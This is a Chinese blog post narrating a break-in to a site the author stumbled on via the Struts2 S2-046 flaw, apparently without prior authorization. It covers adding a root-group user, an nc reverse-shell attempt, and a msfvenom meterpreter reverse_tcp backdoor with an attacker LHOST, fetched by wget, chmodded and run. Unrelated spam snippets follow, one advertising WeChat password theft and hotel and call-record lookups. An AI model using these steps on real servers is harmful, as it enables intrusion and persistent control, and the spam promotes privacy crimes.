一、背景
偶然碰到一个小站存在st2-046代码远程执行漏洞,心里美滋滋。
执行whoami查看自己是什么权限
已经是root了,就尝试上传一个webshell
但是却提示上传失败,页面不存在
上传txt显示成功
经过测试,服务器装有一些防火墙之类的东西或者是安全策略,只要上传的文件里包含可执行代码就上传失败
但是转念一想我为什么非要传webshell,传上去之后不还是要提权,弄到他的ssh权限。
于是冷静思考了一下目前的形势:
1 root权限
2 可以执行非交互性命令
3 不能上传文件
脑海里一道闪电,蹦出来三个思路
1 直接远程执行命令 添加一个用户 然后加入root组
2 nc反弹shell 进行交互性命令 设置用密钥登陆
3 用神器msf生成一个linux后门,进一步拿下ssh
首先useradd test添加一个名为test的用户
因为不能交互 所以无法使用passwd 命令
尝试echo “PASSWORD” | passwd –stdin USERNAME命令
命令执行完成
然后加入root组
用id+用户名查看是否添加成功
奈斯
然后就是高高兴兴去连接ssh
结果他一直拒绝我的密码。。。
这是什么操作。。。
得到了你的人得不到你的心吗。。。
当时也不明白为什么会这样
后来百度查了一下
才知道这个命令有时候是有问题的
思路一失败
既然问题出在加密码的命令上面,我就只要把shell反弹出来然后再使用passwd命令即可
测试了一下目标站不支持其他脚本,也没有nc,就直接用bash转发吧
先打开一台外网windows服务器,开启nc监听
命令为nc.exe –vv –l –p 端口
Linux上bash转发命令如下
提示执行成功
但是windows服务器上并没有收到任何反弹信息
换端口换反弹方式都失败
用脚趾头想想应该是防火墙的问题
思路二失败。
前两次均失败,心里很难受了
不过没关系,我们还有神器msf
假设本机ip为192.168.250.162监听端口为8090
用msf生成一个linux的后门命令如下:
(1)对于metasploit 4.2版本,使用msfpayload生成后门程序,使用msfencode对后门进行二次编码防杀。
生成后门并使用msfencode shikata_ga_nai编码程序对后门程序再编码。
命令:
详解:
使用模块 linux/x86/meterpreter/reverse_tcp 可以实现在32位linux系统上反弹TCP会话
LHOST=192.168.250.162 反弹连接到metasploit攻击主机的IP地址
LPORT=8090 反弹连接到metasploit攻击主机的TCP端口号
-t elf 编码生成的文件类型
-e x86/shikata_ga_nai 使用的编码方式
-c 3 重复封装编码3次
-o /root/test 输出后门文件到/root目录下,文件名test
(2)在较新版本的metasploit中,msfpayload和msfencode已经被取消,功能合并为msfvenom
使用msfvenom创建后门达到相同效果的命令为:
详解:
-a x86 32位
–platform linux 后门程序运行的平台
-plinux/x86/meterpreter/reverse_tcp 使用的payload模块
-ex86/shikata_ga_nai -i 3 使用shikata编码方式,编码3次。
-f elf 输出后门程序格式
(在我测试的过程中如果不使用shikata编码3次生成的后门无法执行,不知道是不是防火墙的原因)
生成好了,然后就是怎么把后门传到目标服务器上的问题
可以用ftp之类的,出于方便就直接用wget
把后门放到网站上或者架设的hfs上
执行成功
ls看一下是否已经下载后门
接下来就在msf上开启监听
msfconsole进入控制台后命令:
Ok监听开启成功
这个时候就要来运行后门
一定要记得更改后门的权限!
一定要记得更改后门的权限!
一定要记得更改后门的权限!
重要的事情说三遍!!!
只有这样后门才有执行的权限
命令:chmod 777 test
然后执行后门
命令: http:///hkjs/test
可以看到已经得到了一个会话
执行whoami 显示root权限
后面的思路就很多了
添加一个后门用户
或者生成一个秘钥直接连接服务器
或者直接用msf维持后门的权限
在这里就直接用passwd改掉咱们原来添加的test的密码
Ok, ssh连接成功
这次的渗透测试还是可以给大家提供一个思路,在遇到st2漏洞但是有防火墙,不能上马,不能反弹shell,只能执行非交互命令的时候可以用msf生成一个后门然后进行进一步提权。
当一种思路不行的时候要学会打开思路,多尝试,多百度。
本次测试仅仅做为学习,漏洞已经提交给管理员,请勿用于非法用途,所产生的一切后果与作者无关。文章如果有问题,欢迎大家及时指正!
*本文原创作者:道恩先生666
苹果手机微信怎么恢复聊天记录啊?使用微信的过程中,经常会出现微信聊天记录丢失的现象,不知你是否有遇到过?重要的聊天记录全都没有了,这该如何是好?其实。 苹果手机怎么恢复微信聊天记录?相信很多人都有过误...
现在很多人非常信任weixin这一款APP,对于企业来说也是的,这一款APP可以更好的衔接很多的客户,而且作为一款办理的渠道优势也是非常多,尤其是微信营销,很多人都通过这一个微信成功的发家致富,而且不...
如今间距二零二一年元月也有一段时间,每一年元月全是完婚的高峰时段,正月是每一年阴历的第一个月,在正月结婚拥有 非常好的喻意,但是我们在挑选结婚日子的情况下還是要参照黄历,依据黄历年来挑选实际的结婚日子...
在本年,咱们还看到了几个“老朋友”,从熟睡中醒来,从头呈现在咱们的视界之中。 在这一章,咱们首要评论一些闻名的歹意安排,因为不明原因(或许是缺少相应的监测)近年来没有发现有太大的动作,但近期又从头呈现...
简述就在这一月,一位安全性研究人员公布了他是怎样渗入进微软公司Visual Studio Code的官方网GitHub储存库的。据统计,微软公司Visual Studio Code的难题管理方法作用中...
查酒店住房记录app(酒店开的房记录别人可以查询吗)专业盗取微信密码,开房查询,通话记录查询,查询微信聊天记录,非常靠谱!在wxid开始时,如何将好友添加到微信帐户中?在注册微信后,我们将在wxid开...